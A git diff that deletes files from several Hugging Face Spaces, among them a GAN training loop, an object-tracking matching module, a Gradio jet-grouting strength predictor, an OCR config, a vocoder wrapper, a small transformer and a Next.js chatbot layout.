- abort_fn = None, # Callback function for determining whether to abort training. Must return consistent results across ranks. - progress_fn = None, # Callback function for updating training progress. Called for all ranks. -): - # Initialize. - start_time = time.time() - device = torch.device('cuda', rank) - np.random.seed(random_seed * num_gpus + rank) - torch.manual_seed(random_seed * num_gpus + rank) - torch.backends.cudnn.benchmark = cudnn_benchmark # Improves training speed. - torch.backends.cuda.matmul.allow_tf32 = False # Improves numerical accuracy. - torch.backends.cudnn.allow_tf32 = False # Improves numerical accuracy. - conv2d_gradfix.enabled = True # Improves training speed. - grid_sample_gradfix.enabled = True # Avoids errors with the augmentation pipe. - - # Load training set. - if rank == 0: - print('Loading training set...') - training_set = dnnlib.util.construct_class_by_name(**training_set_kwargs) # subclass of training.dataset.Dataset - training_set_sampler = misc.InfiniteSampler(dataset=training_set, rank=rank, num_replicas=num_gpus, seed=random_seed) - training_set_iterator = iter(torch.utils.data.DataLoader(dataset=training_set, sampler=training_set_sampler, batch_size=batch_size//num_gpus, **data_loader_kwargs)) - if rank == 0: - print() - print('Num images: ', len(training_set)) - print('Image shape:', training_set.image_shape) - print('Label shape:', training_set.label_shape) - print() - - # Construct networks. - if rank == 0: - print('Constructing networks...') - common_kwargs = dict(c_dim=training_set.label_dim, img_resolution=training_set.resolution, img_channels=training_set.num_channels) - G = dnnlib.util.construct_class_by_name(**G_kwargs, **common_kwargs).train().requires_grad_(False).to(device) # subclass of torch.nn.Module - D = dnnlib.util.construct_class_by_name(**D_kwargs, **common_kwargs).train().requires_grad_(False).to(device) # subclass of torch.nn.Module - G_ema = copy.deepcopy(G).eval() - - # Resume from existing pickle. - if (resume_pkl is not None) and (rank == 0): - print(f'Resuming from "{resume_pkl}"') - with dnnlib.util.open_url(resume_pkl) as f: - resume_data = legacy.load_network_pkl(f) - for name, module in [('G', G), ('D', D), ('G_ema', G_ema)]: - misc.copy_params_and_buffers(resume_data[name], module, require_all=False) - - # Print network summary tables. - if rank == 0: - z = torch.empty([batch_gpu, G.z_dim], device=device) - c = torch.empty([batch_gpu, G.c_dim], device=device) - img = misc.print_module_summary(G, [z, c]) - misc.print_module_summary(D, [img, c]) - - # Setup augmentation. - if rank == 0: - print('Setting up augmentation...') - augment_pipe = None - ada_stats = None - if (augment_kwargs is not None) and (augment_p > 0 or ada_target is not None): - augment_pipe = dnnlib.util.construct_class_by_name(**augment_kwargs).train().requires_grad_(False).to(device) # subclass of torch.nn.Module - augment_pipe.p.copy_(torch.as_tensor(augment_p)) - if ada_target is not None: - ada_stats = training_stats.Collector(regex='Loss/signs/real') - - # Distribute across GPUs. - if rank == 0: - print(f'Distributing across {num_gpus} GPUs...') - for module in [G, D, G_ema, augment_pipe]: - if module is not None and num_gpus > 1: - for param in misc.params_and_buffers(module): - torch.distributed.broadcast(param, src=0) - - # Setup training phases. 
- if rank == 0: - print('Setting up training phases...') - loss = dnnlib.util.construct_class_by_name(device=device, G=G, D=D, augment_pipe=augment_pipe, **loss_kwargs) # subclass of training.loss.Loss - phases = [] - for name, module, opt_kwargs, reg_interval in [('G', G, G_opt_kwargs, G_reg_interval), ('D', D, D_opt_kwargs, D_reg_interval)]: - if reg_interval is None: - opt = dnnlib.util.construct_class_by_name(params=module.parameters(), **opt_kwargs) # subclass of torch.optim.Optimizer - phases += [dnnlib.EasyDict(name=name+'both', module=module, opt=opt, interval=1)] - else: # Lazy regularization. - mb_ratio = reg_interval / (reg_interval + 1) - opt_kwargs = dnnlib.EasyDict(opt_kwargs) - opt_kwargs.lr = opt_kwargs.lr * mb_ratio - opt_kwargs.betas = [beta ** mb_ratio for beta in opt_kwargs.betas] - opt = dnnlib.util.construct_class_by_name(module.parameters(), **opt_kwargs) # subclass of torch.optim.Optimizer - phases += [dnnlib.EasyDict(name=name+'main', module=module, opt=opt, interval=1)] - phases += [dnnlib.EasyDict(name=name+'reg', module=module, opt=opt, interval=reg_interval)] - for phase in phases: - phase.start_event = None - phase.end_event = None - if rank == 0: - phase.start_event = torch.cuda.Event(enable_timing=True) - phase.end_event = torch.cuda.Event(enable_timing=True) - - # Export sample images. - grid_size = None - grid_z = None - grid_c = None - if rank == 0: - print('Exporting sample images...') - grid_size, images, labels = setup_snapshot_image_grid(training_set=training_set) - save_image_grid(images, os.path.join(run_dir, 'reals.png'), drange=[0,255], grid_size=grid_size) - grid_z = torch.randn([labels.shape[0], G.z_dim], device=device).split(batch_gpu) - grid_c = torch.from_numpy(labels).to(device).split(batch_gpu) - images = torch.cat([G_ema(z=z, c=c, noise_mode='const').cpu() for z, c in zip(grid_z, grid_c)]).numpy() - save_image_grid(images, os.path.join(run_dir, 'fakes_init.png'), drange=[-1,1], grid_size=grid_size) - - # Initialize logs. - if rank == 0: - print('Initializing logs...') - stats_collector = training_stats.Collector(regex='.*') - stats_metrics = dict() - stats_jsonl = None - stats_tfevents = None - if rank == 0: - stats_jsonl = open(os.path.join(run_dir, 'stats.jsonl'), 'wt') - try: - import torch.utils.tensorboard as tensorboard - stats_tfevents = tensorboard.SummaryWriter(run_dir) - except ImportError as err: - print('Skipping tfevents export:', err) - - # Train. - if rank == 0: - print(f'Training for {total_kimg} kimg...') - print() - cur_nimg = resume_kimg * 1000 - cur_tick = 0 - tick_start_nimg = cur_nimg - tick_start_time = time.time() - maintenance_time = tick_start_time - start_time - batch_idx = 0 - if progress_fn is not None: - progress_fn(0, total_kimg) - while True: - - # Fetch training data. 
- with torch.autograd.profiler.record_function('data_fetch'): - phase_real_img, phase_real_c = next(training_set_iterator) - phase_real_img = (phase_real_img.to(device).to(torch.float32) / 127.5 - 1).split(batch_gpu) - phase_real_c = phase_real_c.to(device).split(batch_gpu) - all_gen_z = torch.randn([len(phases) * batch_size, G.z_dim], device=device) - all_gen_z = [phase_gen_z.split(batch_gpu) for phase_gen_z in all_gen_z.split(batch_size)] - all_gen_c = [training_set.get_label(np.random.randint(len(training_set))) for _ in range(len(phases) * batch_size)] - all_gen_c = torch.from_numpy(np.stack(all_gen_c)).pin_memory().to(device) - all_gen_c = [phase_gen_c.split(batch_gpu) for phase_gen_c in all_gen_c.split(batch_size)] - - # Execute training phases. - for phase, phase_gen_z, phase_gen_c in zip(phases, all_gen_z, all_gen_c): - if batch_idx % phase.interval != 0: - continue - if phase.start_event is not None: - phase.start_event.record(torch.cuda.current_stream(device)) - - # Accumulate gradients. - phase.opt.zero_grad(set_to_none=True) - phase.module.requires_grad_(True) - for real_img, real_c, gen_z, gen_c in zip(phase_real_img, phase_real_c, phase_gen_z, phase_gen_c): - loss.accumulate_gradients(phase=phase.name, real_img=real_img, real_c=real_c, gen_z=gen_z, gen_c=gen_c, gain=phase.interval, cur_nimg=cur_nimg) - phase.module.requires_grad_(False) - - # Update weights. - with torch.autograd.profiler.record_function(phase.name + '_opt'): - params = [param for param in phase.module.parameters() if param.grad is not None] - if len(params) > 0: - flat = torch.cat([param.grad.flatten() for param in params]) - if num_gpus > 1: - torch.distributed.all_reduce(flat) - flat /= num_gpus - misc.nan_to_num(flat, nan=0, posinf=1e5, neginf=-1e5, out=flat) - grads = flat.split([param.numel() for param in params]) - for param, grad in zip(params, grads): - param.grad = grad.reshape(param.shape) - phase.opt.step() - - # Phase done. - if phase.end_event is not None: - phase.end_event.record(torch.cuda.current_stream(device)) - - # Update G_ema. - with torch.autograd.profiler.record_function('Gema'): - ema_nimg = ema_kimg * 1000 - if ema_rampup is not None: - ema_nimg = min(ema_nimg, cur_nimg * ema_rampup) - ema_beta = 0.5 ** (batch_size / max(ema_nimg, 1e-8)) - for p_ema, p in zip(G_ema.parameters(), G.parameters()): - p_ema.copy_(p.lerp(p_ema, ema_beta)) - for b_ema, b in zip(G_ema.buffers(), G.buffers()): - b_ema.copy_(b) - - # Update state. - cur_nimg += batch_size - batch_idx += 1 - - # Execute ADA heuristic. - if (ada_stats is not None) and (batch_idx % ada_interval == 0): - ada_stats.update() - adjust = np.sign(ada_stats['Loss/signs/real'] - ada_target) * (batch_size * ada_interval) / (ada_kimg * 1000) - augment_pipe.p.copy_((augment_pipe.p + adjust).max(misc.constant(0, device=device))) - - # Perform maintenance tasks once per tick. - done = (cur_nimg >= total_kimg * 1000) - if (not done) and (cur_tick != 0) and (cur_nimg < tick_start_nimg + kimg_per_tick * 1000): - continue - - # Print status line, accumulating the same information in training_stats. 
- tick_end_time = time.time() - fields = [] - fields += [f"tick {training_stats.report0('Progress/tick', cur_tick):<5d}"] - fields += [f"kimg {training_stats.report0('Progress/kimg', cur_nimg / 1e3):<8.1f}"] - fields += [f"time {dnnlib.util.format_time(training_stats.report0('Timing/total_sec', tick_end_time - start_time)):<12s}"] - fields += [f"sec/tick {training_stats.report0('Timing/sec_per_tick', tick_end_time - tick_start_time):<7.1f}"] - fields += [f"sec/kimg {training_stats.report0('Timing/sec_per_kimg', (tick_end_time - tick_start_time) / (cur_nimg - tick_start_nimg) * 1e3):<7.2f}"] - fields += [f"maintenance {training_stats.report0('Timing/maintenance_sec', maintenance_time):<6.1f}"] - fields += [f"cpumem {training_stats.report0('Resources/cpu_mem_gb', psutil.Process(os.getpid()).memory_info().rss / 2**30):<6.2f}"] - fields += [f"gpumem {training_stats.report0('Resources/peak_gpu_mem_gb', torch.cuda.max_memory_allocated(device) / 2**30):<6.2f}"] - fields += [f"reserved {training_stats.report0('Resources/peak_gpu_mem_reserved_gb', torch.cuda.max_memory_reserved(device) / 2**30):<6.2f}"] - torch.cuda.reset_peak_memory_stats() - fields += [f"augment {training_stats.report0('Progress/augment', float(augment_pipe.p.cpu()) if augment_pipe is not None else 0):.3f}"] - training_stats.report0('Timing/total_hours', (tick_end_time - start_time) / (60 * 60)) - training_stats.report0('Timing/total_days', (tick_end_time - start_time) / (24 * 60 * 60)) - if rank == 0: - print(' '.join(fields)) - - # Check for abort. - if (not done) and (abort_fn is not None) and abort_fn(): - done = True - if rank == 0: - print() - print('Aborting...') - - # Save image snapshot. - if (rank == 0) and (image_snapshot_ticks is not None) and (done or cur_tick % image_snapshot_ticks == 0): - images = torch.cat([G_ema(z=z, c=c, noise_mode='const').cpu() for z, c in zip(grid_z, grid_c)]).numpy() - save_image_grid(images, os.path.join(run_dir, f'fakes{cur_nimg//1000:06d}.png'), drange=[-1,1], grid_size=grid_size) - - # Save network snapshot. - snapshot_pkl = None - snapshot_data = None - if (network_snapshot_ticks is not None) and (done or cur_tick % network_snapshot_ticks == 0): - snapshot_data = dict(G=G, D=D, G_ema=G_ema, augment_pipe=augment_pipe, training_set_kwargs=dict(training_set_kwargs)) - for key, value in snapshot_data.items(): - if isinstance(value, torch.nn.Module): - value = copy.deepcopy(value).eval().requires_grad_(False) - if num_gpus > 1: - misc.check_ddp_consistency(value, ignore_regex=r'.*\.[^.]+_(avg|ema)') - for param in misc.params_and_buffers(value): - torch.distributed.broadcast(param, src=0) - snapshot_data[key] = value.cpu() - del value # conserve memory - snapshot_pkl = os.path.join(run_dir, f'network-snapshot-{cur_nimg//1000:06d}.pkl') - if rank == 0: - with open(snapshot_pkl, 'wb') as f: - pickle.dump(snapshot_data, f) - - # Evaluate metrics. - if (snapshot_data is not None) and (len(metrics) > 0): - if rank == 0: - print('Evaluating metrics...') - for metric in metrics: - result_dict = metric_main.calc_metric(metric=metric, G=snapshot_data['G_ema'], - dataset_kwargs=training_set_kwargs, num_gpus=num_gpus, rank=rank, device=device) - if rank == 0: - metric_main.report_metric(result_dict, run_dir=run_dir, snapshot_pkl=snapshot_pkl) - stats_metrics.update(result_dict.results) - del snapshot_data # conserve memory - - # Collect statistics. 
- for phase in phases: - value = [] - if (phase.start_event is not None) and (phase.end_event is not None): - phase.end_event.synchronize() - value = phase.start_event.elapsed_time(phase.end_event) - training_stats.report0('Timing/' + phase.name, value) - stats_collector.update() - stats_dict = stats_collector.as_dict() - - # Update logs. - timestamp = time.time() - if stats_jsonl is not None: - fields = dict(stats_dict, timestamp=timestamp) - stats_jsonl.write(json.dumps(fields) + '\n') - stats_jsonl.flush() - if stats_tfevents is not None: - global_step = int(cur_nimg / 1e3) - walltime = timestamp - start_time - for name, value in stats_dict.items(): - stats_tfevents.add_scalar(name, value.mean, global_step=global_step, walltime=walltime) - for name, value in stats_metrics.items(): - stats_tfevents.add_scalar(f'Metrics/{name}', value, global_step=global_step, walltime=walltime) - stats_tfevents.flush() - if progress_fn is not None: - progress_fn(cur_nimg // 1000, total_kimg) - - # Update state. - cur_tick += 1 - tick_start_nimg = cur_nimg - tick_start_time = time.time() - maintenance_time = tick_start_time - tick_end_time - if done: - break - - # Done. - if rank == 0: - print() - print('Exiting...') - -#---------------------------------------------------------------------------- diff --git a/spaces/ECCV2022/PARSeq-OCR/README.md b/spaces/ECCV2022/PARSeq-OCR/README.md deleted file mode 100644 index 25976e88ef1520b7bc736749f2f798f3caaedcc7..0000000000000000000000000000000000000000 --- a/spaces/ECCV2022/PARSeq-OCR/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: PARSeq OCR -emoji: 📚 -colorFrom: red -colorTo: purple -sdk: gradio -sdk_version: 3.1.3 -python_version: 3.9.13 -app_file: app.py -pinned: false -license: apache-2.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/ECCV2022/bytetrack/yolox/motdt_tracker/matching.py b/spaces/ECCV2022/bytetrack/yolox/motdt_tracker/matching.py deleted file mode 100644 index 01d07da874a793c06eecba172d1e44c7a368234b..0000000000000000000000000000000000000000 --- a/spaces/ECCV2022/bytetrack/yolox/motdt_tracker/matching.py +++ /dev/null @@ -1,116 +0,0 @@ -import cv2 -import numpy as np -import lap -from scipy.spatial.distance import cdist - -from cython_bbox import bbox_overlaps as bbox_ious -from yolox.motdt_tracker import kalman_filter - - -def _indices_to_matches(cost_matrix, indices, thresh): - matched_cost = cost_matrix[tuple(zip(*indices))] - matched_mask = (matched_cost <= thresh) - - matches = indices[matched_mask] - unmatched_a = tuple(set(range(cost_matrix.shape[0])) - set(matches[:, 0])) - unmatched_b = tuple(set(range(cost_matrix.shape[1])) - set(matches[:, 1])) - - return matches, unmatched_a, unmatched_b - - -def linear_assignment(cost_matrix, thresh): - if cost_matrix.size == 0: - return np.empty((0, 2), dtype=int), tuple(range(cost_matrix.shape[0])), tuple(range(cost_matrix.shape[1])) - matches, unmatched_a, unmatched_b = [], [], [] - cost, x, y = lap.lapjv(cost_matrix, extend_cost=True, cost_limit=thresh) - for ix, mx in enumerate(x): - if mx >= 0: - matches.append([ix, mx]) - unmatched_a = np.where(x < 0)[0] - unmatched_b = np.where(y < 0)[0] - matches = np.asarray(matches) - return matches, unmatched_a, unmatched_b - - -def ious(atlbrs, btlbrs): - """ - Compute cost based on IoU - :type atlbrs: list[tlbr] | np.ndarray - :type atlbrs: list[tlbr] | np.ndarray - :rtype ious np.ndarray - """ - ious = np.zeros((len(atlbrs), len(btlbrs)), dtype=np.float) - if 
ious.size == 0: - return ious - - ious = bbox_ious( - np.ascontiguousarray(atlbrs, dtype=np.float), - np.ascontiguousarray(btlbrs, dtype=np.float) - ) - - return ious - - -def iou_distance(atracks, btracks): - """ - Compute cost based on IoU - :type atracks: list[STrack] - :type btracks: list[STrack] - :rtype cost_matrix np.ndarray - """ - atlbrs = [track.tlbr for track in atracks] - btlbrs = [track.tlbr for track in btracks] - _ious = ious(atlbrs, btlbrs) - cost_matrix = 1 - _ious - - return cost_matrix - - -def nearest_reid_distance(tracks, detections, metric='cosine'): - """ - Compute cost based on ReID features - :type tracks: list[STrack] - :type detections: list[BaseTrack] - :rtype cost_matrix np.ndarray - """ - cost_matrix = np.zeros((len(tracks), len(detections)), dtype=np.float) - if cost_matrix.size == 0: - return cost_matrix - - det_features = np.asarray([track.curr_feature for track in detections], dtype=np.float32) - for i, track in enumerate(tracks): - cost_matrix[i, :] = np.maximum(0.0, cdist(track.features, det_features, metric).min(axis=0)) - - return cost_matrix - - -def mean_reid_distance(tracks, detections, metric='cosine'): - """ - Compute cost based on ReID features - :type tracks: list[STrack] - :type detections: list[BaseTrack] - :type metric: str - :rtype cost_matrix np.ndarray - """ - cost_matrix = np.empty((len(tracks), len(detections)), dtype=np.float) - if cost_matrix.size == 0: - return cost_matrix - - track_features = np.asarray([track.curr_feature for track in tracks], dtype=np.float32) - det_features = np.asarray([track.curr_feature for track in detections], dtype=np.float32) - cost_matrix = cdist(track_features, det_features, metric) - - return cost_matrix - - -def gate_cost_matrix(kf, cost_matrix, tracks, detections, only_position=False): - if cost_matrix.size == 0: - return cost_matrix - gating_dim = 2 if only_position else 4 - gating_threshold = kalman_filter.chi2inv95[gating_dim] - measurements = np.asarray([det.to_xyah() for det in detections]) - for row, track in enumerate(tracks): - gating_distance = kf.gating_distance( - track.mean, track.covariance, measurements, only_position) - cost_matrix[row, gating_distance > gating_threshold] = np.inf - return cost_matrix \ No newline at end of file diff --git a/spaces/EstebanDC/UCS_JG/app.py b/spaces/EstebanDC/UCS_JG/app.py deleted file mode 100644 index aed3bceed71e1a8b53f3443a8842cadfc537889b..0000000000000000000000000000000000000000 --- a/spaces/EstebanDC/UCS_JG/app.py +++ /dev/null @@ -1,65 +0,0 @@ -import pickle -import numpy as np -import gradio as gr -import sklearn -import pandas as pd -from sklearn.model_selection import train_test_split -from sklearn.ensemble import ExtraTreesRegressor - -filename = 'Dataset_RCS_3.csv' -names0 = ['JET', "Suelo",'SPT', 'WtoC', 'Presion', 'Velocidad','RCS'] -dataset=pd.read_csv(filename, names=names0) - -y = dataset['RCS'] -X = dataset.drop('RCS', axis=1) - -validation_size = 0.20 -seed = 10 -X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=validation_size, random_state=seed) - - -modelodef=ExtraTreesRegressor( - n_estimators=1000, - max_depth=9, - min_samples_leaf=1, - random_state=seed) -modelodef.fit(X_train, y_train) - -pickle.dump(modelodef, open("modelodef.pkl", "wb")) - - -def RCS(JET, Suelo,SPT, WtoC, Presion, Velocidad): - modelodef = pickle.load(open("modelodef.pkl", "rb")) - prediction0 = modelodef.predict([[JET, Suelo,SPT, WtoC, Presion, Velocidad]]) - prediction = np.round(prediction0,2) - return prediction - -title = "ASSESSMENT OF 
UNIAXIAL COMPRESSIVE STRENGTH OF JET GROUTING" -description = "This app corresponds to the research paper: Assessment of compressive strength of jet grouting by machine learning" -article = """ - Notes: - - Click submit/enviar button to obtain the UCS prediction - - Click clear/limpiar button to refresh text - - Please note the application ranges of the variables in the above-referenced paper (https://doi.org/10.1016/j.jrmge.2023.03.008). Outside these ranges, the predictions may not be reliable - - As a decimal separator you can use either a point or a comma - """ - -app = gr.Interface( - RCS, - inputs=[ - gr.Radio(['1', '2', '3'], label="Jet system. 1: Single. 2: Double. 3: Triple",value="1"), - gr.Radio(['1', '2', '3', '4'], label="Soil type. 1: Coarse without fines. 2: Coarse with fines. 3: Fine. 4: Organic",value="1"), - gr.Number(value=1, label="Nspt"), - gr.Number(value=1, label="W/C"), - gr.Number(value=1, label="Grout pressure (MPa)"), - gr.Number(value=1, label="Rotation speed (rpm)"), - - ], - outputs=[gr.Text(label="UCS (MPa)")], - title=title, - description=description, - article = article, - theme="dark-seafoam" -) - -app.launch() \ No newline at end of file diff --git a/spaces/EuroPython2022/mmocr-demo/configs/textrecog/sar/sar_r31_parallel_decoder_toy_dataset.py b/spaces/EuroPython2022/mmocr-demo/configs/textrecog/sar/sar_r31_parallel_decoder_toy_dataset.py deleted file mode 100644 index 40688d1290080c010beccc271214e5b246b45a32..0000000000000000000000000000000000000000 --- a/spaces/EuroPython2022/mmocr-demo/configs/textrecog/sar/sar_r31_parallel_decoder_toy_dataset.py +++ /dev/null @@ -1,30 +0,0 @@ -_base_ = [ - '../../_base_/default_runtime.py', '../../_base_/recog_models/sar.py', - '../../_base_/schedules/schedule_adam_step_5e.py', - '../../_base_/recog_pipelines/sar_pipeline.py', - '../../_base_/recog_datasets/toy_data.py' -] - -train_list = {{_base_.train_list}} -test_list = {{_base_.test_list}} - -train_pipeline = {{_base_.train_pipeline}} -test_pipeline = {{_base_.test_pipeline}} - -data = dict( - workers_per_gpu=2, - samples_per_gpu=8, - train=dict( - type='UniformConcatDataset', - datasets=train_list, - pipeline=train_pipeline), - val=dict( - type='UniformConcatDataset', - datasets=test_list, - pipeline=test_pipeline), - test=dict( - type='UniformConcatDataset', - datasets=test_list, - pipeline=test_pipeline)) - -evaluation = dict(interval=1, metric='acc') diff --git a/spaces/Felladrin/MiniSearch/src/modules/urlParams.ts b/spaces/Felladrin/MiniSearch/src/modules/urlParams.ts deleted file mode 100644 index 1802fcc4255db54bc72b491e9ab4e125d75b2562..0000000000000000000000000000000000000000 --- a/spaces/Felladrin/MiniSearch/src/modules/urlParams.ts +++ /dev/null @@ -1,4 +0,0 @@ -const urlParams = new URLSearchParams(window.location.search); -export const debug = urlParams.has("debug"); -export const query = urlParams.get("q"); -export const disableWorkers = urlParams.has("disableWorkers"); diff --git a/spaces/FrankZxShen/so-vits-svc-models-ba/diffusion/vocoder.py b/spaces/FrankZxShen/so-vits-svc-models-ba/diffusion/vocoder.py deleted file mode 100644 index bbaa47f64fd5a3191a24dfaa054c423fa86e5bae..0000000000000000000000000000000000000000 --- a/spaces/FrankZxShen/so-vits-svc-models-ba/diffusion/vocoder.py +++ /dev/null @@ -1,94 +0,0 @@ -import torch -from vdecoder.nsf_hifigan.nvSTFT import STFT -from vdecoder.nsf_hifigan.models import load_model,load_config -from torchaudio.transforms import Resample - - -class Vocoder: - def __init__(self, vocoder_type, vocoder_ckpt, 
device = None): - if device is None: - device = 'cuda' if torch.cuda.is_available() else 'cpu' - self.device = device - - if vocoder_type == 'nsf-hifigan': - self.vocoder = NsfHifiGAN(vocoder_ckpt, device = device) - elif vocoder_type == 'nsf-hifigan-log10': - self.vocoder = NsfHifiGANLog10(vocoder_ckpt, device = device) - else: - raise ValueError(f" [x] Unknown vocoder: {vocoder_type}") - - self.resample_kernel = {} - self.vocoder_sample_rate = self.vocoder.sample_rate() - self.vocoder_hop_size = self.vocoder.hop_size() - self.dimension = self.vocoder.dimension() - - def extract(self, audio, sample_rate, keyshift=0): - - # resample - if sample_rate == self.vocoder_sample_rate: - audio_res = audio - else: - key_str = str(sample_rate) - if key_str not in self.resample_kernel: - self.resample_kernel[key_str] = Resample(sample_rate, self.vocoder_sample_rate, lowpass_filter_width = 128).to(self.device) - audio_res = self.resample_kernel[key_str](audio) - - # extract - mel = self.vocoder.extract(audio_res, keyshift=keyshift) # B, n_frames, bins - return mel - - def infer(self, mel, f0): - f0 = f0[:,:mel.size(1),0] # B, n_frames - audio = self.vocoder(mel, f0) - return audio - - -class NsfHifiGAN(torch.nn.Module): - def __init__(self, model_path, device=None): - super().__init__() - if device is None: - device = 'cuda' if torch.cuda.is_available() else 'cpu' - self.device = device - self.model_path = model_path - self.model = None - self.h = load_config(model_path) - self.stft = STFT( - self.h.sampling_rate, - self.h.num_mels, - self.h.n_fft, - self.h.win_size, - self.h.hop_size, - self.h.fmin, - self.h.fmax) - - def sample_rate(self): - return self.h.sampling_rate - - def hop_size(self): - return self.h.hop_size - - def dimension(self): - return self.h.num_mels - - def extract(self, audio, keyshift=0): - mel = self.stft.get_mel(audio, keyshift=keyshift).transpose(1, 2) # B, n_frames, bins - return mel - - def forward(self, mel, f0): - if self.model is None: - print('| Load HifiGAN: ', self.model_path) - self.model, self.h = load_model(self.model_path, device=self.device) - with torch.no_grad(): - c = mel.transpose(1, 2) - audio = self.model(c, f0) - return audio - -class NsfHifiGANLog10(NsfHifiGAN): - def forward(self, mel, f0): - if self.model is None: - print('| Load HifiGAN: ', self.model_path) - self.model, self.h = load_model(self.model_path, device=self.device) - with torch.no_grad(): - c = 0.434294 * mel.transpose(1, 2) - audio = self.model(c, f0) - return audio \ No newline at end of file diff --git a/spaces/Freiburg-AI-Research/dermoscopic_image_generation/glide_text2im/xf.py b/spaces/Freiburg-AI-Research/dermoscopic_image_generation/glide_text2im/xf.py deleted file mode 100644 index 5dfff440b489f3cc3c62450dc28c2f35f692dd94..0000000000000000000000000000000000000000 --- a/spaces/Freiburg-AI-Research/dermoscopic_image_generation/glide_text2im/xf.py +++ /dev/null @@ -1,130 +0,0 @@ -""" -Transformer implementation adapted from CLIP ViT: -https://github.com/openai/CLIP/blob/4c0275784d6d9da97ca1f47eaaee31de1867da91/clip/model.py -""" - -import math - -import torch as th -import torch.nn as nn - - -def convert_module_to_f16(l): - """ - Convert primitive modules to float16. - """ - if isinstance(l, (nn.Linear, nn.Conv2d, nn.ConvTranspose2d)): - l.weight.data = l.weight.data.half() - if l.bias is not None: - l.bias.data = l.bias.data.half() - - -class LayerNorm(nn.LayerNorm): - """ - Implementation that supports fp16 inputs but fp32 gains/biases. 
- """ - - def forward(self, x: th.Tensor): - return super().forward(x.float()).to(x.dtype) - - -class MultiheadAttention(nn.Module): - def __init__(self, n_ctx, width, heads): - super().__init__() - self.n_ctx = n_ctx - self.width = width - self.heads = heads - self.c_qkv = nn.Linear(width, width * 3) - self.c_proj = nn.Linear(width, width) - self.attention = QKVMultiheadAttention(heads, n_ctx) - - def forward(self, x): - x = self.c_qkv(x) - x = self.attention(x) - x = self.c_proj(x) - return x - - -class MLP(nn.Module): - def __init__(self, width): - super().__init__() - self.width = width - self.c_fc = nn.Linear(width, width * 4) - self.c_proj = nn.Linear(width * 4, width) - self.gelu = nn.GELU() - - def forward(self, x): - return self.c_proj(self.gelu(self.c_fc(x))) - - -class QKVMultiheadAttention(nn.Module): - def __init__(self, n_heads: int, n_ctx: int): - super().__init__() - self.n_heads = n_heads - self.n_ctx = n_ctx - - def forward(self, qkv): - bs, n_ctx, width = qkv.shape - attn_ch = width // self.n_heads // 3 - scale = 1 / math.sqrt(math.sqrt(attn_ch)) - qkv = qkv.view(bs, n_ctx, self.n_heads, -1) - q, k, v = th.split(qkv, attn_ch, dim=-1) - weight = th.einsum( - "bthc,bshc->bhts", q * scale, k * scale - ) # More stable with f16 than dividing afterwards - wdtype = weight.dtype - weight = th.softmax(weight.float(), dim=-1).type(wdtype) - return th.einsum("bhts,bshc->bthc", weight, v).reshape(bs, n_ctx, -1) - - -class ResidualAttentionBlock(nn.Module): - def __init__( - self, - n_ctx: int, - width: int, - heads: int, - ): - super().__init__() - - self.attn = MultiheadAttention( - n_ctx, - width, - heads, - ) - self.ln_1 = LayerNorm(width) - self.mlp = MLP(width) - self.ln_2 = LayerNorm(width) - - def forward(self, x: th.Tensor): - x = x + self.attn(self.ln_1(x)) - x = x + self.mlp(self.ln_2(x)) - return x - - -class Transformer(nn.Module): - def __init__( - self, - n_ctx: int, - width: int, - layers: int, - heads: int, - ): - super().__init__() - self.n_ctx = n_ctx - self.width = width - self.layers = layers - self.resblocks = nn.ModuleList( - [ - ResidualAttentionBlock( - n_ctx, - width, - heads, - ) - for _ in range(layers) - ] - ) - - def forward(self, x: th.Tensor): - for block in self.resblocks: - x = block(x) - return x diff --git a/spaces/Fuyuka29/Anime_Background_Remover/README.md b/spaces/Fuyuka29/Anime_Background_Remover/README.md deleted file mode 100644 index 1ba3cb5ea0e994e246d57b7d62b8aa5a6331901c..0000000000000000000000000000000000000000 --- a/spaces/Fuyuka29/Anime_Background_Remover/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: Anime Remove Background -emoji: 🪄🖼️ -colorFrom: indigo -colorTo: pink -sdk: gradio -sdk_version: 3.1.4 -app_file: app.py -pinned: false -license: apache-2.0 -duplicated_from: skytnt/anime-remove-background ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/GXSA/bingo/src/app/layout.tsx b/spaces/GXSA/bingo/src/app/layout.tsx deleted file mode 100644 index 8b5122759987177b8dc4e4356d1d06cea25c15ea..0000000000000000000000000000000000000000 --- a/spaces/GXSA/bingo/src/app/layout.tsx +++ /dev/null @@ -1,47 +0,0 @@ -import { Metadata } from 'next' -import { Toaster } from 'react-hot-toast' -import { TailwindIndicator } from '@/components/tailwind-indicator' -import { Providers } from '@/components/providers' -import { Header } from '@/components/header' - -import '@/app/globals.scss' - - -export const metadata: Metadata = { - title: { - default: 'Bing AI Chatbot', - 
template: `%s - Bing AI Chatbot` - }, - description: 'Bing AI Chatbot Web App.', - themeColor: [ - { media: '(prefers-color-scheme: light)', color: 'white' }, - { media: '(prefers-color-scheme: dark)', color: 'dark' } - ], - icons: { - icon: '/favicon.ico', - shortcut: '../assets/images/logo.svg', - apple: '../assets/images/logo.svg' - } -} - -interface RootLayoutProps { - children: React.ReactNode -} - -export default function RootLayout({ children }: RootLayoutProps) { - return ( - - - - -
    - {/* @ts-ignore */} -
    -
    {children}
    -
    - -
    - - - ) -} diff --git a/spaces/Gallifraid/prompthero-openjourney-v2/app.py b/spaces/Gallifraid/prompthero-openjourney-v2/app.py deleted file mode 100644 index 4fa45eda1d4a0af263ec59b35e375b837fe1ecf1..0000000000000000000000000000000000000000 --- a/spaces/Gallifraid/prompthero-openjourney-v2/app.py +++ /dev/null @@ -1,3 +0,0 @@ -import gradio as gr - -gr.Interface.load("models/prompthero/openjourney-v2").launch() \ No newline at end of file diff --git a/spaces/Gen-Sim/Gen-Sim/cliport/models/backbone_full.py b/spaces/Gen-Sim/Gen-Sim/cliport/models/backbone_full.py deleted file mode 100644 index 9b99b145d2c84444771045ad74992d0bf360f39b..0000000000000000000000000000000000000000 --- a/spaces/Gen-Sim/Gen-Sim/cliport/models/backbone_full.py +++ /dev/null @@ -1,162 +0,0 @@ -# Copyright (c) Aishwarya Kamath & Nicolas Carion. Licensed under the Apache License 2.0. All Rights Reserved -# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved -""" -Backbone modules. -""" -from collections import OrderedDict - -import torch -import torch.nn.functional as F -import torchvision -from timm.models import create_model -from torch import nn -from torchvision.models._utils import IntermediateLayerGetter - 